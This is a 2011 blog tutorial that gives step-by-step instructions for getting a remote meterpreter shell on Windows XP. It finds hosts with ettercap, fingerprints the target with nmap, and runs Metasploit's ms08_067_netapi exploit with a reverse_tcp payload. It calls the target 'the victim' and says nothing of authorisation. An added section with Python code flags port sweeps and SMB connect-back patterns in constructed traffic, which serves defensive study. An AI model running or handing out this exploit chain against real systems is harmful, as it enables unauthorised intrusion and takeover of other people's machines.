Wednesday, May 11, 2011

Basics of gaining access. (HOW TO GAIN ACCESS)

How to get a meterpreter shell.

In this tutorial I am using BackTrack 4 R2 and I'm going to show you how to get a meterpreter shell.

Here are the basics of gaining any type of shell.

How do we check for live hosts?

First we are going to scan to check what ports are open and do OS (Operating System) fingerprinting. But before we do that you're probably wondering how we check if people are on the network and, if they are, what their IP addresses are. What I do, and I believe it is the easiest way by far, is run ettercap. So let's run ettercap: open up a console and type in the following, and ettercap will open up.
ettercap -G

[Image: 1.png]

Then ettercap opens up.

[Image: 2.png]

Now you can use hotkeys like I do to make you look 1337 in front of people, but for now we'll just use the mouse: SNIFF > UNIFIED SNIFFING and choose your interface. Mine is going to be vmnet1 because my Windows XP installation is in VMware. Yours might be wlan0 if you're on a wireless network or eth0 if you're connected over LAN.

[Image: 3.png]

Now let's scan: HOSTS > SCAN FOR HOSTS. I recommend you scan a couple of times, then HOSTS > HOST LIST and you get your list.

[Image: 4.png]

How do we scan for ports and find out what OS he's using?

Okay, pick an IP address from the list and remember it. Now open up a new console to scan the victim with nmap. Nmap has a lot of options so it's really easy to get confused, but I don't want to talk too much about it just yet. So back in our console type in nmap -O [your victim's IP]. The -O option is operating system detection. Then you should get something like this. Just by looking at this we know it's Windows XP with our favorite port open: 445, SMB.
nmap -O [VICTIM IP]

[Image: 5.png]

Now what do we do with our favorite port and all this information?

Now let's open up Metasploit.
cd /pentest/exploits/framework3/

[Image: 6.png]

Always run svn up before starting your attack to update Metasploit. You also need to know your IP address; if you don't know how, type in ifconfig.

Now we know the port number we want to attack: it was 445, SMB. Let's use one of the best exploits out right now, ms08_067_netapi, it will never fail you on an XP system, trust me on this. Now that we know what exploit we are going to use let's set our payload. The payload is the type of shell you want to spawn: it could be a VNC session, a cmd shell or a meterpreter shell. In this tutorial we are going for a reverse TCP meterpreter, which means he will connect to you.
use windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

[Image: 7.png]

Now let's see what options we need to set in order to launch the exploit. Type in show options and you will get something like what I have below. Do you see where it says Required yes? That means fill it out. First thing we see is RHOST, remote host, which is the victim's IP address; the next thing is LHOST, local host, our IP address.
set rhost [VICTIM IP]

set lhost [OUR IP]

[Image: 8.png]

[Image: 9.png]

Now let's run it. If everything goes well then you should get something like what I got.

[Image: 10.png]
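Seen from the network side, the chain in this post has a recognisable shape: one host probes many ports on another (the nmap -O step), then opens an SMB session to port 445, and shortly after the scanned box opens a connection back to the scanner (that is what "reverse TCP, he will connect to you" means). The Python below is an added example, not part of the original post, that flags both patterns over constructed flow records; the IPs, ports and timings are made up.

```python
from collections import defaultdict

# Constructed flow records (seconds, src_ip, dst_ip, dst_port); not
# real traffic. The scanner is 10.0.0.5, the XP box is 10.0.0.20.
FLOWS = [
    (0, "10.0.0.5", "10.0.0.20", 21),
    (0, "10.0.0.5", "10.0.0.20", 22),
    (1, "10.0.0.5", "10.0.0.20", 80),
    (1, "10.0.0.5", "10.0.0.20", 135),
    (2, "10.0.0.5", "10.0.0.20", 139),
    (2, "10.0.0.5", "10.0.0.20", 445),
    (3, "10.0.0.5", "10.0.0.20", 3389),
    (30, "10.0.0.5", "10.0.0.20", 445),   # SMB session carrying the exploit
    (31, "10.0.0.20", "10.0.0.5", 4444),  # victim connects back (reverse_tcp)
    (100, "10.0.0.7", "10.0.0.20", 445),  # normal file-share use, no callback
]

def find_port_sweeps(flows, min_ports=5, window=10):
    """(src, dst) pairs where src hit >= min_ports distinct ports on dst
    within `window` seconds: the shape of an nmap -O scan."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst)].append((ts, port))
    hits = []
    for pair, events in by_pair.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                hits.append(pair)
                break
    return hits

def find_smb_callbacks(flows, window=60):
    """(attacker, victim, port) where victim took an inbound 445
    connection from attacker and then opened an outbound connection
    back to attacker within `window` seconds: reverse_tcp's signature."""
    smb_inbound = [(ts, s, d) for ts, s, d, port in flows if port == 445]
    hits = []
    for ts, src, dst, port in flows:
        for t_smb, attacker, victim in smb_inbound:
            if src == victim and dst == attacker and 0 <= ts - t_smb <= window:
                hits.append((attacker, victim, port))
                break
    return hits

if __name__ == "__main__":
    print("port sweeps:", find_port_sweeps(FLOWS))
    print("SMB callbacks:", find_smb_callbacks(FLOWS))
```

The ordinary file-share access from 10.0.0.7 is not flagged because the XP box never connects back to it; blocking inbound 445 at the perimeter and patching MS08-067 removes the first two steps altogether.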
